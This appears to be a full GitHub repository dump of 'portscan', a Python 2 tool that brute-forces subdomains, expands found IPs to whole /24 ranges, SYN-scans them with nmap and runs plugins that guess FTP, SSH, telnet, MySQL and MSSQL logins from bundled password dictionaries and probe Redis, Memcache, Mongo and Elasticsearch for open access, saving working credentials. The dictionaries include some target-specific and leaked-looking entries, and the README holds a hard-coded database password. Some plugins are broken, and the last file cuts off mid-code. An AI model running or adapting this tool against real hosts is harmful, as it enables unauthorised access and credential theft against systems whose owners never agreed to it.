├── .gitattributes ├── .gitignore ├── README.md ├── dict ├── dns_servers.txt ├── ftp_pass.dic ├── ftp_user.dic ├── imap_pass.dic ├── imap_user.dic ├── ipc_pass.dic ├── ipc_user.dic ├── mssql_pass.dic ├── mssql_user.dic ├── mysql_pass.dic ├── mysql_user.dic ├── next_sub.txt ├── pop_pass.dic ├── pop_user.dic ├── ssh_pass.dic ├── ssh_user.dic ├── subnames.txt ├── subnames_largest.txt ├── telnet_pass.dic └── telnet_user.dic ├── lib ├── __init__.py ├── __init__.pyc ├── dnstask.py ├── dnstask.pyc ├── iplist.py ├── iplist.pyc ├── mongodb.py ├── mongodb.pyc ├── plugins │ ├── __init__.py │ ├── __init__.pyc │ ├── elasticsearch.py │ ├── ftp.py │ ├── ftp.pyc │ ├── memcache.py │ ├── mongo.py │ ├── mssql.py │ ├── mysql.py │ ├── oracle.py │ ├── redis.py │ ├── rsync.py │ ├── ssh.py │ └── telnet.py ├── portscan.py └── portscan.pyc ├── require.sh └── scan.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Compiled Object files, Static and Dynamic libs (Shared Objects) 2 | *.o 3 | *.a 4 | *.so 5 | 6 | # Folders 7 | _obj 8 | _test 9 | 10 | # Architecture specific extensions/prefixes 11 | *.[568vq] 12 | [568vq].out 13 | 14 | *.cgo1.go 15 | *.cgo2.c 16 | _cgo_defun.c 17 | _cgo_gotypes.go 18 | _cgo_export.* 19 | 20 | _testmain.go 21 | 22 | *.exe 23 | *.test 24 | *.prof 25 | 26 | # ========================= 27 | # Operating System Files 28 | # ========================= 29 | 30 | # OSX 31 | # ========================= 32 | 33 | .DS_Store 34 | .AppleDouble 35 | .LSOverride 36 | 37 | # Thumbnails 38 | ._* 39 | 40 | # Files that might appear in the root of a volume 41 | .DocumentRevisions-V100 42 | .fseventsd 43 | .Spotlight-V100 44 | .TemporaryItems 45 | .Trashes 46 | .VolumeIcon.icns 47 | 48 | # Directories potentially created on remote AFP share 49 | .AppleDB 50 | .AppleDesktop 51 | Network Trash Folder 52 | Temporary Items 53 | .apdisk 54 | 55 | # Windows 56 | # ========================= 57 | 58 | # Windows image file caches 59 | Thumbs.db 60 | ehthumbs.db 61 | 62 | # Folder config file 63 | Desktop.ini 64 | 65 | # Recycle Bin used on file shares 66 | $RECYCLE.BIN/ 67 | 68 | # Windows Installer files 69 | *.cab 70 | *.msi 71 | *.msm 72 | *.msp 73 | 74 | # Windows shortcuts 75 | *.lnk 76 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # portscan 2 | 3 | 4 | 依赖 5 | ./req.sh 6 | ``` 7 | apt-get install -y python-dev 8 | apt-get install -y nmap 9 | pip install paramiko 10 | apt-get install -y python2.7-mysqldb 11 | pip install dnspython 12 | pip install pymongo 13 | pip install python-nmap 14 | apt-get install -y freetds-dev 15 | pip install pymssql 16 | pip install redis 17 | pip install python-memcached 18 | pip install 19 | ``` 20 | 21 | mongo设置 22 | ``` 23 | docker run --name hackdb -p 37017:27017 -d mongo --auth 24 | docker exec -it hackdb mongo admin 25 | db.createUser({ user: 'jax777', pwd: 'hackall', roles: [ { role: "__system", db: "admin" } ] }); 26 | ``` 27 | 28 | 29 | 待写 30 | ``` 31 | mstsc 32 | ldap 33 | vnc 34 | Pcanywhere 35 | IIS PUT写文件 36 | Resin 37 | Oracle 1521 38 | PostgreSQL 39 | ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。zookeeper未授权访问,泄露敏感信息,os,hostname,还有存的数据键值,zk默认端口2181 40 | ``` 41 | -------------------------------------------------------------------------------- /dict/dns_servers.txt: -------------------------------------------------------------------------------- 1 | 114.114.114.114 2 | 114.114.115.115 3 | 180.76.76.76 4 | 223.5.5.5 5 | 223.6.6.6 6 | -------------------------------------------------------------------------------- /dict/ftp_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* 24 | 37wan 25 | 37youxi 26 | 37yunwei 27 | yunwei_37 28 | 37_yunwei 29 | test 30 | test123 31 | qazxsw123 32 | 1qazxsw2 33 | 1qazxsw23edc 34 | 753951 35 | 37wan.com 36 | www.37.com 37 | 37games 38 | password 39 | qwerty 40 | abc123 41 | abc1234 42 | abc123456 43 | 123456789 44 | iloveyou 45 | fuckyou 46 | 000000 -------------------------------------------------------------------------------- /dict/ftp_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | administrator 9 | oracle 10 | sybase 11 | informix 12 | oracle8 13 | backup 14 | lizdy 15 | server 16 | data 17 | account 18 | access 19 | ftproot 20 | pwrchute -------------------------------------------------------------------------------- /dict/imap_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- /dict/imap_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | administrator 9 | oracle 10 | sybase 11 | informix 12 | oracle8 13 | backup 14 | lizdy 15 | server 16 | data 17 | account 18 | access 19 | pwrchute -------------------------------------------------------------------------------- /dict/ipc_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- /dict/ipc_user.dic: -------------------------------------------------------------------------------- 1 | administrator 2 | admin 3 | user 4 | guest 5 | webmaster -------------------------------------------------------------------------------- /dict/mssql_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* 24 | user -------------------------------------------------------------------------------- /dict/mssql_user.dic: -------------------------------------------------------------------------------- 1 | sa 2 | sql 3 | database 4 | admin 5 | facemash 6 | root -------------------------------------------------------------------------------- /dict/mysql_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %null% 3 | 123 4 | 1234 5 | 12345 6 | 123456 7 | admin 8 | root 9 | pass 10 | password 11 | pa$$word 12 | blah 13 | vas867832 14 | kfac7890 15 | blog&|!1 16 | newsearch 17 | hntdep7 18 | 1-a-2-b-3-c-4-d 19 | cambiame 20 | sr2498 21 | Rlqja1004 22 | a123456 23 | c9v9c5d 24 | 8leb1l09 25 | changeme 26 | vpn 27 | brad 28 | apmsetup 29 | insider123+! 30 | god1 31 | 891222 32 | autoset 33 | 20140303Dyw 34 | buratino 35 | 26rivFOy 36 | a2 -------------------------------------------------------------------------------- /dict/mysql_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | mysql 3 | facemash 4 | xbt 5 | user 6 | a2808024_vas7831 7 | kfac 8 | a1650715_root 9 | newsearch 10 | a9487812_simon 11 | a5970070_ander 12 | webguest 13 | cambiame 14 | a4964131_usr 15 | civicedu 16 | insider 17 | testapp 18 | sch9 19 | admin546_5 -------------------------------------------------------------------------------- /dict/next_sub.txt: -------------------------------------------------------------------------------- 1 | test 2 | test2 3 | t 4 | dev 5 | 1 6 | 2 7 | 3 8 | s1 9 | s2 10 | s3 11 | admin 12 | adm 13 | a 14 | ht 15 | adminht 16 | webht 17 | web 18 | gm 19 | sys 20 | system 21 | manage 22 | manager 23 | mgr 24 | b 25 | c 26 | passport 27 | bata 28 | wei 29 | weixin 30 | wechat 31 | wx 32 | wiki 33 | upload 34 | ftp 35 | pic 36 | jira 37 | zabbix 38 | nagios 39 | bug 40 | bugzilla 41 | sql 42 | mysql 43 | db 44 | stmp 45 | pop 46 | imap 47 | mail 48 | zimbra 49 | exchange 50 | forum 51 | bbs 52 | list 53 | count 54 | counter 55 | img 56 | img01 57 | img02 58 | img03 59 | img04 60 | api 61 | cache 62 | js 63 | css 64 | app 65 | apps 66 | wap 67 | m 68 | sms 69 | zip 70 | monitor 71 | proxy 72 | update 73 | upgrade 74 | stat 75 | stats 76 | data 77 | portal 78 | blog 79 | autodiscover 80 | en 81 | search 82 | so 83 | oa 84 | database 85 | home 86 | sso 87 | help 88 | vip 89 | s 90 | w 91 | down 92 | download 93 | downloads 94 | dl 95 | svn 96 | git 97 | log 98 | staff 99 | vpn 100 | sslvpn 101 | ssh 102 | scanner 103 | sandbox 104 | ldap 105 | lab 106 | go 107 | demo 108 | console 109 | cms 110 | auth 111 | crm 112 | erp 113 | res 114 | static 115 | old 116 | new 117 | beta 118 | image 119 | service 120 | login 121 | 3g 122 | docs 123 | it 124 | e 125 | live 126 | library 127 | files 128 | i 129 | d 130 | cp 131 | connect 132 | gateway 133 | lib 134 | preview 135 | backup 136 | share 137 | status 138 | assets 139 | user 140 | vote 141 | bugs 142 | cas 143 | feedback 144 | id 145 | edm 146 | survey 147 | union 148 | ceshi 149 | dev1 150 | updates 151 | phpmyadmin 152 | pma 153 | edit 154 | master 155 | xml 156 | control 157 | profile 158 | zhidao 159 | tool 160 | toolbox 161 | boss 162 | activity -------------------------------------------------------------------------------- /dict/pop_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- /dict/pop_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | administrator 9 | oracle 10 | sybase 11 | informix 12 | oracle8 13 | backup 14 | lizdy 15 | server 16 | data 17 | account 18 | access 19 | pwrchute -------------------------------------------------------------------------------- /dict/ssh_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- /dict/ssh_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | oracle 9 | sybase 10 | informix 11 | oracle8 12 | backup 13 | lizdy 14 | server 15 | data 16 | account 17 | access -------------------------------------------------------------------------------- /dict/telnet_pass.dic: -------------------------------------------------------------------------------- 1 | %username% 2 | %username%12 3 | %username%123 4 | %null% 5 | 1 6 | 111 7 | 123 8 | 1234 9 | 12345 10 | 123456 11 | 1234567 12 | 12345678 13 | 654321 14 | 54321 15 | 00000000 16 | 88888888 17 | admin 18 | root 19 | pass 20 | passwd 21 | password 22 | super 23 | !@#$%^&* -------------------------------------------------------------------------------- /dict/telnet_user.dic: -------------------------------------------------------------------------------- 1 | root 2 | admin 3 | webmaster 4 | user 5 | test 6 | web 7 | www 8 | oracle 9 | sybase 10 | informix 11 | oracle8 12 | backup 13 | lizdy 14 | server 15 | data 16 | account 17 | access -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/__init__.py -------------------------------------------------------------------------------- /lib/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/__init__.pyc -------------------------------------------------------------------------------- /lib/dnstask.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # __author__ jax777 4 | import Queue 5 | import sys 6 | import dns.resolver 7 | import threading 8 | import time 9 | import os 10 | 11 | def is_intranet(ip): #内网ip 判断 12 | ret = ip.split('.') 13 | if not len(ret) == 4: 14 | return 1 15 | if ret[0] == '10': 16 | return 1 17 | if ret[0] == '172' and 16 <= int(ret[1]) <= 32: 18 | return 1 19 | if ret[0] == '192' and ret[1] == '168': 20 | return 1 21 | return 0 22 | 23 | 24 | 25 | class Dnstask: 26 | def __init__(self, target,names_file, threads_num,mongodb,g_lock): 27 | self.db = mongodb 28 | self.STOP_ME = False 29 | self.target = target.strip() 30 | self.names_file = names_file 31 | self.thread_count = self.threads_num = threads_num 32 | self.scan_count = self.found_count = 0 33 | self.lock = threading.Lock() 34 | self.resolvers = [dns.resolver.Resolver() for _ in range(threads_num)] 35 | self._load_dns_servers() 36 | self._load_sub_names() 37 | self._load_next_sub() 38 | self.ip_dict = {} 39 | self.STOP_ME = False 40 | self.g_lock = g_lock 41 | 42 | 43 | 44 | def _load_dns_servers(self): 45 | dns_servers = [] 46 | with open('dict/dns_servers.txt') as f: 47 | for line in f: 48 | server = line.strip() 49 | if server.count('.') == 3 and server not in dns_servers: 50 | dns_servers.append(server) 51 | self.dns_servers = dns_servers 52 | self.dns_count = len(dns_servers) 53 | 54 | def _load_sub_names(self): 55 | self.queue = Queue.Queue() 56 | file = 'dict/' + self.names_file if not os.path.exists(self.names_file) else self.names_file 57 | with open(file) as f: 58 | for line in f: 59 | sub = line.strip() 60 | if sub: self.queue.put(sub) 61 | 62 | def _load_next_sub(self): 63 | next_subs = [] 64 | with open('dict/next_sub.txt') as f: 65 | for line in f: 66 | sub = line.strip() 67 | if sub and sub not in next_subs: 68 | next_subs.append(sub) 69 | self.next_subs = next_subs 70 | def _update_scan_count(self): 71 | self.lock.acquire() 72 | self.scan_count += 1 73 | self.lock.release() 74 | 75 | def _print_progress(self): 76 | self.lock.acquire() 77 | msg = '%s found | %s remaining | %s scanned in %.2f seconds' % ( 78 | self.found_count, self.queue.qsize(), self.scan_count, time.time() - self.start_time) 79 | sys.stdout.write('\r' + ' ' + msg) 80 | sys.stdout.flush() 81 | self.lock.release() 82 | 83 | 84 | def _scan(self): 85 | thread_id = int( threading.currentThread().getName() ) 86 | self.resolvers[thread_id].nameservers.insert(0, self.dns_servers[thread_id % self.dns_count]) 87 | self.resolvers[thread_id].lifetime = self.resolvers[thread_id].timeout = 10.0 88 | while self.queue.qsize() > 0 and not self.STOP_ME and self.found_count < 4000: # limit found count to 4000 89 | sub = self.queue.get(timeout=1.0) 90 | for _ in range(6): 91 | try: 92 | cur_sub_domain = sub + '.' + self.target 93 | answers = self.resolvers[thread_id].query(cur_sub_domain) 94 | is_wildcard_record = False 95 | if answers: 96 | for answer in answers: 97 | self.lock.acquire() 98 | if answer.address not in self.ip_dict: 99 | self.ip_dict[answer.address] = 1 100 | else: 101 | self.ip_dict[answer.address] += 1 102 | if self.ip_dict[answer.address] > 2: # a wildcard DNS record 103 | is_wildcard_record = True 104 | self.lock.release() 105 | if is_wildcard_record: 106 | self._update_scan_count() 107 | self._print_progress() 108 | continue 109 | self.lock.acquire() 110 | self.found_count += 1 111 | msg = cur_sub_domain.ljust(30) 112 | sys.stdout.write( msg + '\n') 113 | sys.stdout.flush() 114 | self.lock.release() 115 | for i in self.next_subs: 116 | self.queue.put(i + '.' + sub) 117 | for answer in answers: 118 | temp = answer.address 119 | sys.stdout.write(temp) 120 | ip_info = dict( 121 | site = cur_sub_domain, 122 | ip = temp, 123 | portinfo = {}, 124 | islocal = is_intranet(temp), 125 | status = 0, 126 | isup = 1 127 | ) 128 | if self.db.find({"ip": temp }).count() == 0 : 129 | self.db.insert(ip_info) 130 | break 131 | except dns.resolver.NoNameservers, e: 132 | break 133 | except Exception, e: 134 | pass 135 | self._update_scan_count() 136 | self._print_progress() 137 | self._print_progress() 138 | self.lock.acquire() 139 | self.thread_count -= 1 140 | self.lock.release() 141 | def run(self): 142 | self.g_lock.acquire() 143 | self.start_time = time.time() 144 | for i in range(self.threads_num): 145 | t = threading.Thread(target=self._scan, name=str(i)) 146 | t.setDaemon(True) 147 | t.start() 148 | while 1: 149 | if self.thread_count > 1: 150 | try: 151 | time.sleep(1.0) 152 | except KeyboardInterrupt,e: 153 | msg = '[WARNING] User aborted, wait all slave threads to exit...' 154 | sys.stdout.write('\r' + msg + '\n\r') 155 | sys.stdout.flush() 156 | self.STOP_ME = True 157 | if self.thread_count == 0: 158 | self.g_lock.release() 159 | break -------------------------------------------------------------------------------- /lib/dnstask.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/dnstask.pyc -------------------------------------------------------------------------------- /lib/iplist.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | 4 | 5 | def lsip(mongodb): 6 | ip_info = dict( 7 | site = "", 8 | ip = "", 9 | portinfo = {}, 10 | islocal = 0, 11 | status = 0 12 | ) 13 | iplist = [] 14 | for item in mongodb.find({"islocal": 0 }): 15 | tempip = re.findall(r'\d+.\d+.\d+.',item["ip"]) 16 | if tempip[0] not in iplist: 17 | iplist.append(tempip[0]) 18 | for ip in iplist: 19 | for i in range(1,255): 20 | iptemp = ip + str(i) 21 | if mongodb.find({"ip": iptemp }).count() == 0 : 22 | ip_info = dict( 23 | site = "", 24 | ip = iptemp, 25 | portinfo = {}, 26 | islocal = 0, 27 | status = 0, 28 | isup = 1 29 | ) 30 | mongodb.insert(ip_info) 31 | -------------------------------------------------------------------------------- /lib/iplist.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/iplist.pyc -------------------------------------------------------------------------------- /lib/mongodb.py: -------------------------------------------------------------------------------- 1 | # coding: utf8 2 | import pymongo 3 | 4 | db_info = dict( 5 | host="127.0.0.1", 6 | port=37017, 7 | username="jax777", 8 | password="hackall" 9 | ) 10 | 11 | 12 | 13 | def Mongodb( db_info,db_name): 14 | db_info = db_info 15 | client = pymongo.MongoClient(db_info.get('host'), db_info.get('port')) 16 | client.security_detect.authenticate( 17 | db_info.get('username'), 18 | db_info.get('password'), 19 | source='admin' 20 | ) 21 | db = client["scan_info"] 22 | return db[db_name] 23 | 24 | -------------------------------------------------------------------------------- /lib/mongodb.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/mongodb.pyc -------------------------------------------------------------------------------- /lib/plugins/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/plugins/__init__.py -------------------------------------------------------------------------------- /lib/plugins/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/plugins/__init__.pyc -------------------------------------------------------------------------------- /lib/plugins/elasticsearch.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | 3 | 4 | def elasticsearch_attack(host, port, mongo): 5 | _info = dict( 6 | name="elasticsearch", 7 | ip=host, 8 | port=port, 9 | username="", 10 | password="" 11 | ) 12 | mongo.insert(_info) 13 | -------------------------------------------------------------------------------- /lib/plugins/ftp.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | 3 | import ftplib 4 | 5 | 6 | 7 | def ftp_attack(host, port, mongo): 8 | _info = dict( 9 | name="ftp", 10 | ip=host, 11 | port=port, 12 | username="", 13 | password="" 14 | ) 15 | # 先测试匿名登陆 16 | try: 17 | ftp = ftplib.FTP() 18 | ftp.connect(host, port, 5) 19 | ftp.login() 20 | ftp.quit() 21 | mongo.insert(_info) 22 | return 23 | except ftplib.all_errors: 24 | pass 25 | 26 | # 字典爆破测试 27 | for username in open("dict/ftp_user.dic"): 28 | for password in open("dict/ftp_pass.dic"): 29 | _username = username.strip() 30 | _password = password.strip() 31 | try: 32 | ftp = ftplib.FTP() 33 | ftp.connect(host, port, 5) 34 | ftp.login(_username, _password) 35 | ftp.quit() 36 | _info["username"] = _username 37 | _info["password"] = _password 38 | mongo.insert(_info) 39 | break 40 | except ftplib.all_errors: 41 | pass 42 | -------------------------------------------------------------------------------- /lib/plugins/ftp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/plugins/ftp.pyc -------------------------------------------------------------------------------- /lib/plugins/memcache.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import memcache 3 | def memcache_attack(host, port, mongo): 4 | _info = dict( 5 | name="memcache", 6 | ip=host, 7 | port=port, 8 | username="", 9 | password="" 10 | ) 11 | try: 12 | 13 | mc = memcache.Client([host+':'+port],debug=0) 14 | mc.set("foo","bar") 15 | mongo.insert(_info) 16 | except: 17 | pass -------------------------------------------------------------------------------- /lib/plugins/mongo.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import pymongo 3 | 4 | 5 | def mongo_attack(host, port, mongo): 6 | _info = dict( 7 | name="mongo", 8 | ip=host, 9 | port=port, 10 | username="", 11 | password="" 12 | ) 13 | try: 14 | conn = pymongo.MongoClient(host, port, socketTimeoutMS=3000) 15 | dbname = conn.database_names() 16 | mongo.insert(_info) 17 | except: 18 | pass 19 | -------------------------------------------------------------------------------- /lib/plugins/mssql.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | 3 | import pymssql 4 | 5 | def mssql_attack(host, port, mongo): 6 | _info = dict( 7 | name="mssql", 8 | ip=host, 9 | port=port, 10 | username="", 11 | password="" 12 | ) 13 | 14 | # 字典爆破测试 15 | for username in open("dict/ssh_user.dic", "r"): 16 | for password in open("dict/ssh_pass.dic", "r"): 17 | _username = username.strip() 18 | _password = password.strip() 19 | try: 20 | conn=pymssql.connect(host=host,user=_username,password=_password,database="*") 21 | _info["username"] = _username 22 | _info["password"] = _password 23 | mongo.insert(_info) 24 | conn.close() 25 | break 26 | except: 27 | pass -------------------------------------------------------------------------------- /lib/plugins/mysql.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import MySQLdb 3 | 4 | def mysql_attack(host, port, mongo): 5 | _info = dict( 6 | name="mysql", 7 | ip=host, 8 | port=port, 9 | username="", 10 | password="" 11 | ) 12 | 13 | # 字典爆破测试 14 | for username in open("dict/mysql_user.dic", "r"): 15 | for password in open("dict/mysql_pass.dic", "r"): 16 | _username = username.strip() 17 | _password = password.strip() 18 | try: 19 | db = MySQLdb.connect(host=host, user=_username, passwd=_password, port=3306) 20 | _info["username"] = _username 21 | _info["password"] = _password 22 | mongo.insert(_info) 23 | db.close() 24 | break 25 | except: 26 | pass 27 | -------------------------------------------------------------------------------- /lib/plugins/oracle.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | 3 | def oracle_attack(host, port, mongo): 4 | _info = dict( 5 | name="mysql", 6 | ip=host, 7 | port=port, 8 | username="", 9 | password="" 10 | ) 11 | 12 | # 字典爆破测试 13 | for username in open("dict/oracle_user.dic", "r"): 14 | for password in open("dict/oracle_pass.dic", "r"): 15 | _username = username.strip() 16 | _password = password.strip() 17 | try: 18 | _info["username"] = _username 19 | _info["password"] = _password 20 | mongo.insert(_info) 21 | db.close() 22 | break 23 | except: 24 | pass 25 | -------------------------------------------------------------------------------- /lib/plugins/redis.py: -------------------------------------------------------------------------------- 1 | import redis 2 | 3 | 4 | def redis_attack(host, port, mongo): 5 | _info = dict( 6 | name="redis", 7 | ip=host, 8 | port=port, 9 | username="", 10 | password="" 11 | ) 12 | try: 13 | r = redis.StrictRedis(host='localhost', port=6379, db=0,socket_timeout=2) 14 | r.set('foo', 'bar') 15 | mongo.insert(_info) 16 | except: 17 | pass 18 | -------------------------------------------------------------------------------- /lib/plugins/rsync.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | 3 | import subprocess 4 | import time 5 | # failed 6 | def rsync_attack(host, port, mongo): 7 | _info = dict( 8 | name="rsync", 9 | ip=host, 10 | port=port, 11 | username="", 12 | password="" 13 | ) 14 | 15 | try: 16 | cmd = "rsync "+host+"::; exit 0" 17 | p = subprocess.Popen(cmd,stdout=None) 18 | time.sleep(2) 19 | if p.poll(): 20 | pass 21 | else: 22 | mongo.insert(_info) 23 | except: 24 | pass 25 | -------------------------------------------------------------------------------- /lib/plugins/ssh.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | 3 | import paramiko 4 | 5 | 6 | def ssh_attack(host, port, mongo): 7 | _info = dict( 8 | name="ssh", 9 | ip=host, 10 | port=port, 11 | username="", 12 | password="" 13 | ) 14 | 15 | # 字典爆破测试 16 | for username in open("dict/ssh_user.dic", "r"): 17 | for password in open("dict/ssh_pass.dic", "r"): 18 | _username = username.strip() 19 | _password = password.strip() 20 | try: 21 | ssh = paramiko.SSHClient() 22 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 23 | ssh.connect(host, 22, _username, _password, timeout=5) 24 | _info["username"] = _username 25 | _info["password"] = _password 26 | mongo.insert(_info) 27 | break 28 | except: 29 | pass 30 | -------------------------------------------------------------------------------- /lib/plugins/telnet.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | 3 | import telnetlib 4 | 5 | 6 | def telnet_attack(host, port, mongo): 7 | _info = dict( 8 | name="telnet", 9 | ip=host, 10 | port=port, 11 | username="", 12 | password="" 13 | ) 14 | 15 | # 字典爆破测试 16 | for username in open("dict/telnet_user.dic", "r"): 17 | for password in open("dict/telnet_pass.dic", "r"): 18 | _username = username.strip() 19 | _password = password.strip() 20 | try: 21 | tn = telnetlib.Telnet(host, port, timeout=1) 22 | tn.set_debuglevel(3) 23 | # 输入登录用户名 24 | tn.read_until("login: ") 25 | tn.write(_username + '\n') 26 | # 输入登录密码 27 | tn.read_until("Password: ") 28 | tn.write(_password + '\n') 29 | if tn.read_until(_username + "@"): 30 | _info["username"] = _username 31 | _info["password"] = _password 32 | mongo.insert(_info) 33 | break 34 | except: 35 | pass 36 | -------------------------------------------------------------------------------- /lib/portscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # __author__ jax777 4 | import nmap 5 | import threading 6 | import Queue 7 | import sys 8 | import time 9 | from plugins.ftp import * 10 | from plugins.ssh import * 11 | from plugins.telnet import * 12 | from plugins.mongo import * 13 | from plugins.mysql import * 14 | from plugins.mssql import * 15 | from plugins.memcache import * 16 | from plugins.elasticsearch import * 17 | from plugins.redis import * 18 | from plugins.rsync import * 19 | 20 | 21 | class Portscan: 22 | def __init__(self,threads_num,mongodb,g_lock,Wdb): 23 | self.wdb = Wdb 24 | self.db = mongodb 25 | self.thread_count = self.threads_num = threads_num 26 | self.g_lock = g_lock 27 | self.lock = threading.Lock() 28 | self.STOP_ME = False 29 | 30 | def _queuesetup(self): 31 | self.queue = Queue.Queue() 32 | for item in self.db.find({"status": 0 }): 33 | self.queue.put(item["ip"]) 34 | def _startnmap(self): 35 | while self.queue.qsize() > 0 and not self.STOP_ME : 36 | ip = self.queue.get(timeout=1.0) 37 | print "start scan" + ip + "\n" 38 | self.db.update({'ip': ip}, {"$set" : {'status' : 1}}) 39 | result = {} 40 | try: 41 | nm = nmap.PortScanner() 42 | nm.scan(hosts= ip , arguments='-sS -p 21,22,23,25,53,67,68,69,80,110,139,143,161,389,443,512,513,514,873,1080,1352,1433,1521,2049,2181,3306,3389,4000-5000,5432,5632,5900,6379,7000-9000,9090,9200,9300,11211,27017,37017') 43 | result = nm[ip].get("tcp") 44 | result = {str(v):k for v, k in result.items()} 45 | for v, k in result.items(): 46 | if k["state"] != "open": 47 | result.pop(v) 48 | try: 49 | for j,q in result.items(): 50 | port = int(j) 51 | try: 52 | if port == 21: 53 | ftp_attack(ip,port,self.wdb) #attack 54 | elif port == 22: 55 | ssh_attack(ip,port,self.wdb) 56 | elif port == 23: 57 | telnet_attack(ip,port,self.wdb) 58 | elif port == 873: 59 | rsync_attack(ip,port,self.wdb) 60 | elif port == 27017: 61 | mongo_attack(ip,port,self.wdb) 62 | elif port == 37017: 63 | mongo_attack(ip,port,self.wdb) 64 | elif port == 3306: 65 | mysql_attack(ip,port,self.wdb) 66 | elif port == 1433: 67 | mssql_attack(ip,port,self.wdb) 68 | elif port == 6379: 69 | redis_attack(ip,port,self.wdb) 70 | elif port == 9200: 71 | elasticsearch_attack(ip,port,self.wdb) 72 | elif port == 11211: 73 | memcache_attack(ip,port,self.wdb) 74 | except IOError: 75 | print "nofile" 76 | except AttributeError: 77 | 